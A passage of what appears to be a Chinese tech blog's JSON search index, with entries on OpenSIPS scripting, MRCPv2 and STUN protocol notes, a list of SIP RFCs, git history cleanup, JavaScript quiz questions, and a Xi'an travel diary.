ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","permalink":"https://wdd.js.org/opensips/3x/module-args/","summary":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? 
ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","title":"模块传参的重构"},{"content":" TelNYX.pdf OpenSIPS 2.3 mediasoup Cutting Edge WebRTC Video COnferencing FreeSWITCH-driven routing in OpenSIPS Voicenter: Contact center on Steroids Vlad_Paiu-Distributed_OpenSIPS_Systems_Cluecon14.pdf Vlad_Paiu-OpenSIPS_Summit_Austin_2015-Async.pdf Ionut_Ionita-OpenSIPS_Summit2017-Capturing_beyond_SIP FLAVIO_GONCALVES-Fraud_in_VoIP_Today.pdf Alexandr_Dubovikov-OpenSIPS_Summit2017-RTC_Threat_Intelligence_Exchange.pdf OpenSIPS_LoadBalancing.pdf Vlad_Paiu-OpenSIPS_Summit_2104-OpenSIPS_End_User_Services.pdf Razvan_Crainea-OpenSIPS_Summit2017-From_SIPI_Trunks_to_End_Users.pdf Razvan_Crainea-OpenSIPS_Summit-Scaling_Asterisk.pdf Vlad_Paiu-OpenSIPS_Summit-Service_Enabling_for_Asterisk.pdf Jonas_Borjesson-OpenSIPS_Summit_Austin_2015.pdf Michele_Pinasi-OpenSIPS_Summit2017-How_we_did_VoIP.pdf Bogdan_Iancu-OpenSIPS_Summit_Keynotes.pdf Giovanni_Maruzselli-OpenSIPS_Summit2017-Scaling_FreeSWITCHes.pdf Maksym_Sobolyev-OpenSIPS_Summit2017-Sippy_Labs_update.pdf docker-cluster.pdf voip malware attack tool .pdf Bogdan_Iancu-OpenSIPS_Summit-OpenSIPS_2_1.pdf Pete_Kelly-OpenSIPS_Workshop_Chicago_2015-Calling_Cards_B2BUA.pdf Bogdan_Iancu-OpenSIPS_Summit-keynotes.pdf Alex_Goulis-Opensips_CNAME.pdf OpenSIPS_2.0_Framework.pdf Norman_Brandinger-OpenSIPS_Summit_2014-Advanced_SIP_Routing_with_OpenSIPS_modules.pdf 
","permalink":"https://wdd.js.org/opensips/pdf/","summary":" TelNYX.pdf OpenSIPS 2.3 mediasoup Cutting Edge WebRTC Video COnferencing FreeSWITCH-driven routing in OpenSIPS Voicenter: Contact center on Steroids Vlad_Paiu-Distributed_OpenSIPS_Systems_Cluecon14.pdf Vlad_Paiu-OpenSIPS_Summit_Austin_2015-Async.pdf Ionut_Ionita-OpenSIPS_Summit2017-Capturing_beyond_SIP FLAVIO_GONCALVES-Fraud_in_VoIP_Today.pdf Alexandr_Dubovikov-OpenSIPS_Summit2017-RTC_Threat_Intelligence_Exchange.pdf OpenSIPS_LoadBalancing.pdf Vlad_Paiu-OpenSIPS_Summit_2104-OpenSIPS_End_User_Services.pdf Razvan_Crainea-OpenSIPS_Summit2017-From_SIPI_Trunks_to_End_Users.pdf Razvan_Crainea-OpenSIPS_Summit-Scaling_Asterisk.pdf Vlad_Paiu-OpenSIPS_Summit-Service_Enabling_for_Asterisk.pdf Jonas_Borjesson-OpenSIPS_Summit_Austin_2015.pdf Michele_Pinasi-OpenSIPS_Summit2017-How_we_did_VoIP.pdf Bogdan_Iancu-OpenSIPS_Summit_Keynotes.pdf Giovanni_Maruzselli-OpenSIPS_Summit2017-Scaling_FreeSWITCHes.pdf Maksym_Sobolyev-OpenSIPS_Summit2017-Sippy_Labs_update.pdf docker-cluster.pdf voip malware attack tool .pdf Bogdan_Iancu-OpenSIPS_Summit-OpenSIPS_2_1.pdf Pete_Kelly-OpenSIPS_Workshop_Chicago_2015-Calling_Cards_B2BUA.pdf Bogdan_Iancu-OpenSIPS_Summit-keynotes.pdf Alex_Goulis-Opensips_CNAME.pdf OpenSIPS_2.0_Framework.pdf Norman_Brandinger-OpenSIPS_Summit_2014-Advanced_SIP_Routing_with_OpenSIPS_modules.pdf ","title":"Pdf学习资料"},{"content":"一年过半以后,偶然打开微信公众号,看到草稿箱里的篇文章。我才回想起去年带女友去西安的那个遥远的夏天。\n如今女友已经变成老婆,这篇文章我才想起来发表。\nday 1 钟楼 鼓楼 回民街 那是六月末的时候,和女友一起坐火车去了趟西安。\n为什么要去西安呢?据吃货女友说,西安有非常多的好吃的。所以人生是必须要去一趟的。\n清晨,我们从南京南站出发坐动车,一路向西,坐了5个多小时,到达西安北站。\n路上我带了一个1500ml的水瓶,以及1500ml的酸奶。\n女友吐槽说,还好没做飞机,不然我就像宝强一样,要在机场干完一大瓶酸奶了。\n下了动车,立即前往钟楼订的宾馆,放置行李。\n西安钟楼位于西安市中心,是中国现存钟楼中形制最大、保存最完整的一座。建于明太祖洪武十七年,初建于今广济街口,与鼓楼相对,明神宗万历十年整体迁移于今址。\n沿着钟楼附近,我们逛了一圈回民街。\n回民街是西安著名的美食文化街区,是西安小吃街区。\n西安回民街作为西安风情的代表之一,是回民街区多条街道的统称,由北广济街、北院门、西羊市、大皮院、化觉巷、洒金桥等数条街道组成,在钟鼓楼后。\n钟楼\nday 2 大唐芙蓉城 大唐不夜城 大雁塔 
大唐芙蓉城是一座仿唐建筑,里面有许多景点,或许我们不应该早上来,因为上午太热了。\n唯一庆幸的是,我们带了一个很大的水杯,而且芙蓉城里提供免费的开水,所以我们才没有被渴死。\n大唐芙蓉城 西游师徒四人 雕塑\n傍晚的 大唐不夜城\n夜幕降临的 大唐不夜城\n遗憾之一:大雁塔没有去看,因为当时正在维修,周围全是脚手架。 遗憾之二:没有到陕西历史博物馆看看,因为没有早点预约\n女友埋怨我说我不早点做攻略,害得这么多景点去不了。\n我说我是做了攻略的,还记在备忘录里面呢。\n女友打开我的备忘录一看,笑出眼泪说:你做的啥狗屁攻略,就这几个字!男人果然靠不住!\n我说: 这你就不懂了吧,啥都写清楚,一个一个点打卡多没意思。\nday3 华清宫 兵马俑 长恨歌 由于西安攻略做的太过肤浅,所以第二天晚上决定直接跟团。在网上买了两张华清宫兵马俑和长恨歌的一日游。\n说实在的,华清宫没啥意思,都是洗澡池子。\n蒋介石洗过澡的池子,杨贵妃的洗澡池子,唐明皇的洗澡池子,大臣们的洗澡池子。\n逛完之后,下午我们坐着旅游大巴,前往兵马俑。\n一号坑\n一号坑\n一号坑\n一号坑\n一号坑\n兵马俑有三个坑。\n一号坑最大,兵马俑也是最多的。然而当时游客比肩接踵,加上天气炎热,大家都在里面像蒸桑拿一样。\n出了一号坑,我心里想:这么大个坑,这么热为啥不装空调,难道是因为要保护文物吗?\n后来据博物馆的讲解员介绍:不装空调是因为审核手续复杂,可能要要个几十年手续才能完成。像二号坑和三号坑都已经装好空调了。\n二号坑真的是个坑,没有兵马俑,仅仅是个大坑。\n三号坑比较小,仅有几个陶俑。\n长恨歌实际上是一个大型的室外表演,由白居易的《长恨歌》演绎而来,讲述唐明皇和杨贵妃的爱恨情长。灯光绚丽,舞蹈优美,感人至深。\n关于西安美食就很多了\n毛笔酥\n六大碗\n毛笔酥 酸梅汤\n","permalink":"https://wdd.js.org/posts/2022/12/xian-travel/","summary":"一年过半以后,偶然打开微信公众号,看到草稿箱里的篇文章。我才回想起去年带女友去西安的那个遥远的夏天。\n如今女友已经变成老婆,这篇文章我才想起来发表。\nday 1 钟楼 鼓楼 回民街 那是六月末的时候,和女友一起坐火车去了趟西安。\n为什么要去西安呢?据吃货女友说,西安有非常多的好吃的。所以人生是必须要去一趟的。\n清晨,我们从南京南站出发坐动车,一路向西,坐了5个多小时,到达西安北站。\n路上我带了一个1500ml的水瓶,以及1500ml的酸奶。\n女友吐槽说,还好没做飞机,不然我就像宝强一样,要在机场干完一大瓶酸奶了。\n下了动车,立即前往钟楼订的宾馆,放置行李。\n西安钟楼位于西安市中心,是中国现存钟楼中形制最大、保存最完整的一座。建于明太祖洪武十七年,初建于今广济街口,与鼓楼相对,明神宗万历十年整体迁移于今址。\n沿着钟楼附近,我们逛了一圈回民街。\n回民街是西安著名的美食文化街区,是西安小吃街区。\n西安回民街作为西安风情的代表之一,是回民街区多条街道的统称,由北广济街、北院门、西羊市、大皮院、化觉巷、洒金桥等数条街道组成,在钟鼓楼后。\n钟楼\nday 2 大唐芙蓉城 大唐不夜城 大雁塔 大唐芙蓉城是一座仿唐建筑,里面有许多景点,或许我们不应该早上来,因为上午太热了。\n唯一庆幸的是,我们带了一个很大的水杯,而且芙蓉城里提供免费的开水,所以我们才没有被渴死。\n大唐芙蓉城 西游师徒四人 雕塑\n傍晚的 大唐不夜城\n夜幕降临的 大唐不夜城\n遗憾之一:大雁塔没有去看,因为当时正在维修,周围全是脚手架。 遗憾之二:没有到陕西历史博物馆看看,因为没有早点预约\n女友埋怨我说我不早点做攻略,害得这么多景点去不了。\n我说我是做了攻略的,还记在备忘录里面呢。\n女友打开我的备忘录一看,笑出眼泪说:你做的啥狗屁攻略,就这几个字!男人果然靠不住!\n我说: 这你就不懂了吧,啥都写清楚,一个一个点打卡多没意思。\nday3 华清宫 兵马俑 长恨歌 
由于西安攻略做的太过肤浅,所以第二天晚上决定直接跟团。在网上买了两张华清宫兵马俑和长恨歌的一日游。\n说实在的,华清宫没啥意思,都是洗澡池子。\n蒋介石洗过澡的池子,杨贵妃的洗澡池子,唐明皇的洗澡池子,大臣们的洗澡池子。\n逛完之后,下午我们坐着旅游大巴,前往兵马俑。\n一号坑\n一号坑\n一号坑\n一号坑\n一号坑\n兵马俑有三个坑。\n一号坑最大,兵马俑也是最多的。然而当时游客比肩接踵,加上天气炎热,大家都在里面像蒸桑拿一样。\n出了一号坑,我心里想:这么大个坑,这么热为啥不装空调,难道是因为要保护文物吗?\n后来据博物馆的讲解员介绍:不装空调是因为审核手续复杂,可能要要个几十年手续才能完成。像二号坑和三号坑都已经装好空调了。\n二号坑真的是个坑,没有兵马俑,仅仅是个大坑。\n三号坑比较小,仅有几个陶俑。\n长恨歌实际上是一个大型的室外表演,由白居易的《长恨歌》演绎而来,讲述唐明皇和杨贵妃的爱恨情长。灯光绚丽,舞蹈优美,感人至深。\n关于西安美食就很多了\n毛笔酥\n六大碗\n毛笔酥 酸梅汤","title":"西安之旅 不仅有羊肉泡馍 也有长恨歌"},{"content":"简介 MRCPv2 是Media Resource Control Protocol Version 2的缩写 MRCP 允许客户端去操作服务端的媒体资源处理 MRCP 的常见功能如下 文本转语音 语音识别 说话人识别 语音认证 等等 MRCP 并不是一个独立的协议,而是依赖于其他的协议,如 SIP/SDP MRCPv2 RFC 发表于 2012 年 MRCPv2 主要由思科,Nuance,Speechworks 开发 MRCPv2 是基于 MRCPv1 开发的 MRCPv2 不兼容 MRCPv1 MRCPv2 在传输层使用 TCP 或者 TLS 定义 媒体资源: An entity on the speech processing server that can be controlled through MRCPv2. MRCP 服务器: Aggregate of one or more \u0026ldquo;Media Resource\u0026rdquo; entities on a server, exposed through MRCPv2. Often, \u0026lsquo;server\u0026rsquo; in this document refers to an MRCP server. MRCP 客户端: An entity controlling one or more Media Resources through MRCPv2 (\u0026ldquo;Client\u0026rdquo; for short). DTMF: Dual-Tone Multi-Frequency; a method of transmitting key presses in-band, either as actual tones (Q.23 [Q.23]) or as named tone events (RFC 4733 [RFC4733]). Endpointing: The process of automatically detecting the beginning and end of speech in an audio stream. This is critical both for speech recognition and for automated recording as one would find in voice mail systems. Hotword Mode: A mode of speech recognition where a stream of utterances is evaluated for match against a small set of command words. This is generally employed either to trigger some action or to control the subsequent grammar to be used for further recognition. 
架构 客户端使用SIP/SDP建立MRCP控制通道 SIP使用SDP的offer/answer模型来描述MRCP通道的参数 服务端在answer SDP中提供唯一的通道ID和服务端TCP端口号 客户端可以开启一个新的TCP链接,多个MRCP通道也可以共享一个TCP链接 管理资源控制通道 This \u0026ldquo;m=\u0026rdquo; line MUST have a media type field of \u0026ldquo;application\u0026rdquo; transport type field of either \u0026ldquo;TCP/MRCPv2\u0026rdquo; or \u0026ldquo;TCP/TLS/MRCPv2\u0026rdquo; The port number field of the \u0026ldquo;m=\u0026rdquo; line MUST contain the \u0026ldquo;discard\u0026rdquo; port of the transport protocol (port 9 for TCP) in the SDP offer from the client MUST contain the TCP listen port on the server in the SDP answer MRCPv2 servers MUST NOT assume any relationship between resources using the same port other than the sharing of the communication channel. To remain backwards compatible with conventional SDP usage, the format field of the \u0026ldquo;m=\u0026rdquo; line MUST have the arbitrarily selected value of \u0026ldquo;1\u0026rdquo;. The a=connection attribute MUST have a value of \u0026ldquo;new\u0026rdquo; on the very first control \u0026ldquo;m=\u0026rdquo; line offer from the client to an MRCPv2 server Subsequent control \u0026ldquo;m=\u0026rdquo; line offers from the client to the MRCP server MAY contain \u0026ldquo;new\u0026rdquo; or \u0026ldquo;existing\u0026rdquo;, depending on whether the client wants to set up a new connection or share an existing connection When the client wants to deallocate the resource from this session, it issues a new SDP offer, according to RFC 3264 [RFC3264], where the control \u0026ldquo;m=\u0026rdquo; line port MUST be set to 0 When the client wants to tear down the whole session and all its resources, it MUST issue a SIP BYE request to close the SIP session. This will deallocate all the control channels and resources allocated under the session. 
MRCPv2 Session Termination If an MRCP client notices that the underlying connection has been closed for one of its MRCP channels, and it has not previously initiated a re-INVITE to close that channel, it MUST send a BYE to close down the SIP dialog and all other MRCP channels. If an MRCP server notices that the underlying connection has been closed for one of its MRCP channels, and it has not previously received and accepted a re-INVITE closing that channel, then it MUST send a BYE to close down the SIP dialog and all other MRCP channels.\nMRCP request request-line = mrcp-version SP message-length SP method-name SP request-id CRLF request-id = 1*10DIGIT MRCP response response-line = mrcp-version SP message-length SP request-id SP status-code SP request-state CRLF status-code = 3DIGIT request-state = \u0026ldquo;COMPLETE\u0026rdquo; / \u0026ldquo;IN-PROGRESS\u0026rdquo; / \u0026ldquo;PENDING\u0026rdquo; event event-line = mrcp-version SP message-length SP event-name SP request-id SP request-state CRLF event-name = synthesizer-event / recognizer-event / recorder-event / verifier-event 参考 https://www.rfc-editor.org/rfc/rfc6787 ","permalink":"https://wdd.js.org/posts/2022/12/mrcp-notes/","summary":"简介 MRCPv2 是Media Resource Control Protocol Version 2的缩写 MRCP 允许客户端去操作服务端的媒体资源处理 MRCP 的常见功能如下 文本转语音 语音识别 说话人识别 语音认证 等等 MRCP 并不是一个独立的协议,而是依赖于其他的协议,如 SIP/SDP MRCPv2 RFC 发表于 2012 年 MRCPv2 主要由思科,Nuance,Speechworks 开发 MRCPv2 是基于 MRCPv1 开发的 MRCPv2 不兼容 MRCPv1 MRCPv2 在传输层使用 TCP 或者 TLS 定义 媒体资源: An entity on the speech processing server that can be controlled through MRCPv2. 
MRCP 服务器: Aggregate of one or more \u0026ldquo;Media Resource\u0026rdquo; entities on a server, exposed through MRCPv2.","title":"MRCPv2 协议学习"},{"content":"有些时候,git 仓库累积了太多无用的历史更改,导致 clone 文件过大。如果确定历史更改没有意义,可以采用下述方法清空历史,\n先 clone 项目到本地目录 (以名为 mylearning 的仓库为例) git clone git@gitee.com:badboycoming/mylearning.git 进入 mylearning 仓库,拉一个分支,比如名为 latest_branch git checkout --orphan latest_branch 添加所有文件到上述分支 (Optional) git add -A 提交一次 git commit -am \u0026#34;Initial commit.\u0026#34; 删除 master 分支 git branch -D master 更改当前分支为 master 分支 git branch -m master 将本地所有更改 push 到远程仓库 git push -f origin master 关联本地 master 到远程 master git branch --set-upstream-to=origin/master ","permalink":"https://wdd.js.org/git/clean-all-history/","summary":"有些时候,git 仓库累积了太多无用的历史更改,导致 clone 文件过大。如果确定历史更改没有意义,可以采用下述方法清空历史,\n先 clone 项目到本地目录 (以名为 mylearning 的仓库为例) git clone git@gitee.com:badboycoming/mylearning.git 进入 mylearning 仓库,拉一个分支,比如名为 latest_branch git checkout --orphan latest_branch 添加所有文件到上述分支 (Optional) git add -A 提交一次 git commit -am \u0026#34;Initial commit.\u0026#34; 删除 master 分支 git branch -D master 更改当前分支为 master 分支 git branch -m master 将本地所有更改 push 到远程仓库 git push -f origin master 关联本地 master 到远程 master git branch --set-upstream-to=origin/master ","title":"清除所有GIT历史记录"},{"content":"git remote set-url origin repo-url ","permalink":"https://wdd.js.org/git/remote-url/","summary":"git remote set-url origin repo-url ","title":"GIT 重新设置远程url"},{"content":"1. 分析输出 for (var i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } for (let i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } 2. 分析输出 const shape = { radius: 10, diameter() { return this.radius * 2 }, perimeter: () =\u0026gt; 2 * Math.PI * this.radius, } shape.diameter() shape.perimeter() 3. 分析输出 const a = {} function test1(a) { a = { name: \u0026#39;wdd\u0026#39;, } } function test2() { test1(a) } function test3() { console.log(a) } test2() test3() 4. 
分析输出 class Chameleon { static colorChange(newColor) { this.newColor = newColor return this.newColor } constructor({ newColor = \u0026#39;green\u0026#39; } = {}) { this.newColor = newColor } } const freddie = new Chameleon({ newColor: \u0026#39;purple\u0026#39; }) freddie.colorChange(\u0026#39;orange\u0026#39;) 5. 分析输出 function Person(firstName, lastName) { this.firstName = firstName this.lastName = lastName } const member = new Person(\u0026#39;Lydia\u0026#39;, \u0026#39;Hallie\u0026#39;) Person.getFullName = function () { return `${this.firstName} ${this.lastName}` } console.log(member.getFullName()) 6. 事件传播的三个阶段是什么? A: Target \u0026gt; Capturing \u0026gt; Bubbling B: Bubbling \u0026gt; Target \u0026gt; Capturing C: Target \u0026gt; Bubbling \u0026gt; Capturing D: Capturing \u0026gt; Target \u0026gt; Bubbling 7. 所有对象都有原型 A: 对 B: 错\n8. 输出? function sum(a, b) { return a + b } sum(1, \u0026#39;2\u0026#39;) 9. 输出? function getPersonInfo(one, two, three) { console.log(one) console.log(two) console.log(three) } const person = \u0026#39;Lydia\u0026#39; const age = 21 getPersonInfo`${person} is ${age} years old` 输出? function checkAge(data) { if (data === { age: 18 }) { console.log(\u0026#39;You are an adult!\u0026#39;) } else if (data == { age: 18 }) { console.log(\u0026#39;You are still an adult.\u0026#39;) } else { console.log(`Hmm.. You don\u0026#39;t have an age I guess`) } } checkAge({ age: 18 }) 输出? function getAge(...args) { console.log(typeof args) } getAge(21) ","permalink":"https://wdd.js.org/fe/js-questions/","summary":"1. 分析输出 for (var i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } for (let i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } 2. 分析输出 const shape = { radius: 10, diameter() { return this.radius * 2 }, perimeter: () =\u0026gt; 2 * Math.PI * this.radius, } shape.diameter() shape.perimeter() 3. 
分析输出 const a = {} function test1(a) { a = { name: \u0026#39;wdd\u0026#39;, } } function test2() { test1(a) } function test3() { console.","title":"JS 考题"},{"content":"想查资料,发现 deepin 居然没有 man 这个命令。\n安装 sudo apt-get install man-db 使用介绍 ","permalink":"https://wdd.js.org/posts/2022/11/deepin-install-man/","summary":"想查资料,发现 deepin 居然没有 man 这个命令。\n安装 sudo apt-get install man-db 使用介绍 ","title":"Deepin安装man命令"},{"content":"脚本变量 avp 变量 伪变量 SIP 头, $(hdr(name)) $(hdr(name)[N]) - represents the body of the N-th header identified by \u0026rsquo;name\u0026rsquo;. If [N] is omitted then the body of the first header is printed. The first header is got when N=0, for the second N=1, a.s.o. To print the last header of that type, use -1, no other negative values are supported now. No white spaces are allowed inside the specifier (before }, before or after {, [, ] symbols). When N=\u0026rsquo;*\u0026rsquo;, all headers of that type are printed.\nThe module should identify most of compact header names (the ones recognized by OpenSIPS which should be all at this moment), if not, the compact form has to be specified explicitly. It is recommended to use dedicated specifiers for headers (e.g., %ua for user agent header), if they are available \u0026ndash; they are faster.\n$(hdrcnt(name)) \u0026ndash; returns number of headers of type given by \u0026rsquo;name\u0026rsquo;. Uses same rules for specifying header names as $hdr(name) above. Many headers (e.g., Via, Path, Record-Route) may appear more than once in the message. This variable returns the number of headers of a given type.\nNote that some headers (e.g., Path) may be joined together with commas and appear as a single header line.
This variable counts the number of header lines, not header values.\nFor message fragment below, $hdrcnt(Path) will have value 2 and $(hdr(Path)[0]) will have value \u0026lt;a.com\u0026gt;:\nPath: \u0026lt;a.com\u0026gt; Path: \u0026lt;b.com\u0026gt; For message fragment below, $hdrcnt(Path) will have value 1 and $(hdr(Path)[0]) will have value \u0026lt;a.com\u0026gt;,\u0026lt;b.com\u0026gt;:\nPath: \u0026lt;a.com\u0026gt;,\u0026lt;b.com\u0026gt; Note that both examples above are semantically equivalent but the variables take on different values.\n","permalink":"https://wdd.js.org/2.4.x-docs/core-vars/","summary":"脚本变量 avp 变量 伪变量 SIP 头, $(hdr(name)) $(hdr(name)[N]) - represents the body of the N-th header identified by \u0026rsquo;name\u0026rsquo;. If [N] is omitted then the body of the first header is printed. The first header is got when N=0, for the second N=1, a.s.o. To print the last header of that type, use -1, no other negative values are supported now. No white spaces are allowed inside the specifier (before }, before or after {, [, ] symbols).","title":"核心变量"},{"content":" RFC 名称 https://tools.ietf.org/html/rfc3261 SIP: Session Initiation Protocol https://tools.ietf.org/html/rfc3665 Session Initiation Protocol (SIP) Basic Call Flow Examples https://tools.ietf.org/html/rfc6141 Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc4566 SDP: Session Description Protocol https://tools.ietf.org/html/rfc4028 Session Timers in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc1889 RTP: A Transport Protocol for Real-Time Applications https://tools.ietf.org/html/rfc2326 Real Time Streaming Protocol (RTSP) https://tools.ietf.org/html/rfc2327 SDP: Session Description Protocol https://tools.ietf.org/html/rfc3015 Megaco Protocol Version 1.0 https://tools.ietf.org/html/rfc1918 Address Allocation for Private Internets https://tools.ietf.org/html/rfc2663 IP Network Address Translator (NAT) 
Terminology and Considerations https://tools.ietf.org/html/rfc3605 Real Time Control Protocol (RTCP) attribute in Session Description Protocol (SDP) https://tools.ietf.org/html/rfc3711 The Secure Real-time Transport Protocol (SRTP) https://tools.ietf.org/html/rfc4568 Session Description Protocol (SDP) Security Descriptions for Media Streams https://tools.ietf.org/html/rfc4585 Extended RTP Profile for Real-time Transport Control Protocol (RTCP)-Based Feedback (RTP/AVPF) https://tools.ietf.org/html/rfc5124 Extended Secure RTP Profile for Real-time Transport Control Protocol (RTCP)-Based Feedback (RTP/SAVPF) https://tools.ietf.org/html/rfc5245 Interactive Connectivity Establishment (ICE): A Protocol for Network Address Translator (NAT) Traversal for Offer/Answer Protocols https://tools.ietf.org/html/rfc5626 Managing Client-Initiated Connections in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc5761 Multiplexing RTP Data and Control Packets on a Single Port https://tools.ietf.org/html/rfc5764 Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) ","permalink":"https://wdd.js.org/opensips/ch1/sip-rfcs/","summary":"RFC 名称 https://tools.ietf.org/html/rfc3261 SIP: Session Initiation Protocol https://tools.ietf.org/html/rfc3665 Session Initiation Protocol (SIP) Basic Call Flow Examples https://tools.ietf.org/html/rfc6141 Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc4566 SDP: Session Description Protocol https://tools.ietf.org/html/rfc4028 Session Timers in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc1889 RTP: A Transport Protocol for Real-Time Applications https://tools.ietf.org/html/rfc2326 Real Time Streaming Protocol (RTSP) https://tools.ietf.org/html/rfc2327 SDP: Session Description Protocol https://tools.ietf.org/html/rfc3015 Megaco Protocol Version 1.0 
https://tools.ietf.org/html/rfc1918 Address Allocation for Private Internets https://tools.","title":"SIP相关RFC协议"},{"content":" title: \u0026ldquo;STUN协议笔记\u0026rdquo; date: \u0026ldquo;2022-01-06 17:54:10\u0026rdquo; draft: false STUN是Simple Traversal of User Datagram Protocol (UDP) through Network Address Translators (NAT’s)的缩写 传输层底层用的是UDP 主要用来NAT穿透 主要用来解决voip领域的单方向通话(one-way)的问题 目的是让NAT后面的设备能发现自己的公网IP以及NAT的类型 让外部设备能够找到合适的端口和内部设备通信 刷新NAT绑定,类似keep-alive机制。否则端口映射可能因为超时被释放 STUN是cs架构的协议 客户端端192.168.1.3,使用5060端口,发送stun请求到 64.25.58.65, 经过了192.168.1.1的网关之后 网关将源ip改为212.128.56.125, 端口改为15050 stun服务器将请求发送到 网关的外网端口15050,然后网关将请求转发给192.168.1.3:5060 stun message type which typically is one of the below: - 0x0001 : Binding Request - 0x0101 : Binding Response\n0x0111 : Binding Error Response 0x0002 : Shared Secret Request 0x0102 : Shared Secret Response 0x0112 : Shared Secret Error Response **0x0001: MAPPED-ADDRESS - **This attribute contains an IP address and port. It is always placed in the Binding Response, and it indicates the source IP address and port the server saw in the Binding Request sent from the client, i.e.; the STUN client’s public IP address and port where it can be reached from the internet.\n0x0002: RESPONSE-ADDRESS - This attribute contains an IP address and port and is an optional attribute, typically in the Binding Request (sent from the STUN client to the STUN server). It indicates where the Binding Response (sent from the STUN server to the STUN client) is to be sent. If this attribute is not present in the Binding Request, the Binding Response is sent to the source IP address and port of the Binding Request which is attribute 0x0001: MAPPED-ADDRESS.\n0x0003: CHANGE-REQUEST - This attribute, which is only allowed in the Binding Request and optional, contains two flags; to control the IP address and port used to send the response. These flags are called \u0026ldquo;change IP\u0026rdquo; and \u0026ldquo;change Port\u0026rdquo; flags. 
The \u0026ldquo;change IP\u0026rdquo; and \u0026ldquo;change Port\u0026rdquo; flags are useful for determining whether the client is behind a restricted cone NAT or restricted port cone NAT. They instruct the server to send the Binding Responses from a different source IP address and port.\n**0x0004: SOURCE-ADDRESS - **This attribute is usually present in Binding Responses; it indicates the source IP address and port where the response was sent from, i.e. the IP address of the machine the client is running on (typically an internal private IP address). It is very useful as from this attribute the STUN server can detect twice NAT configurations.\n**0x0005: CHANGED-ADDRESS - **This attribute is usually present in Binding Responses; it informs the client of the source IP address and port that would be used if the client requested the \u0026ldquo;change IP\u0026rdquo; and \u0026ldquo;change port\u0026rdquo; behaviour.\n0x0006: USERNAME - This attribute is optional and is present in a Shared Secret Response with the PASSWORD attribute. It serves as a means to identify the shared secret used in the message integrity check.\n0x0007: PASSWORD - This attribute is optional and only present in Shared Secret Response along with the USERNAME attribute. The value of the PASSWORD attribute is of variable length and used as a shared secret between the STUN server and the STUN client.\n0x0008: MESSAGE-INTEGRITY - This attribute must be the last attribute in a STUN message and can be present in both Binding Request and Binding Response. It contains HMAC-SHA1 of the STUN message.\n**0x0009: ERROR-CODE - **This attribute is present in the Binding Error Response and Shared Secret Error Response only. It indicates that an error has occurred and indicates also the type of error which has occurred. 
It contains a numerical value in the range of 100 to 699; which is the error code and also a textual reason phrase encoded in UTF-8 describing the error code, which is meant for the client.\n0x000a: UNKNOWN-ATTRIBUTES - This attribute is present in the Binding Error Response or Shared Secret Error response when the error code is 420; some attributes sent from the client in the Request are unknown and the server does not understand them.\n0x000b: REFLECTED-FROM - This attribute is present only in Binding Response and its use is to provide traceability so the STUN server cannot be used as part of a denial of service attack. It contains the IP address of the source from where the request came from, i.e. the IP address of the STUN client.\nCommon STUN Server error codes Like many other protocols, the STUN protocol has a list of error codes. STUN protocol error codes are similar to those of HTTP or SIP. Below is a list of most common error codes encountered when using the STUN protocol. For a complete list of STUN protocol error codes refer to the STUN RFC 3489.\nError Code 400 - Bad request; the request was malformed. Client must modify request and try sending it again. Error Code 420 - Unknown attribute; the server did not understand an attribute in the request. Error Code 430 - Stale credentials; the shared secret sent in the request is expired; the client should obtain a new shared secret. Error Code 432 - Missing username; the username attribute is not present in the request. Error Code 500 - Server error; temporary error and the client should try to send the request again. 
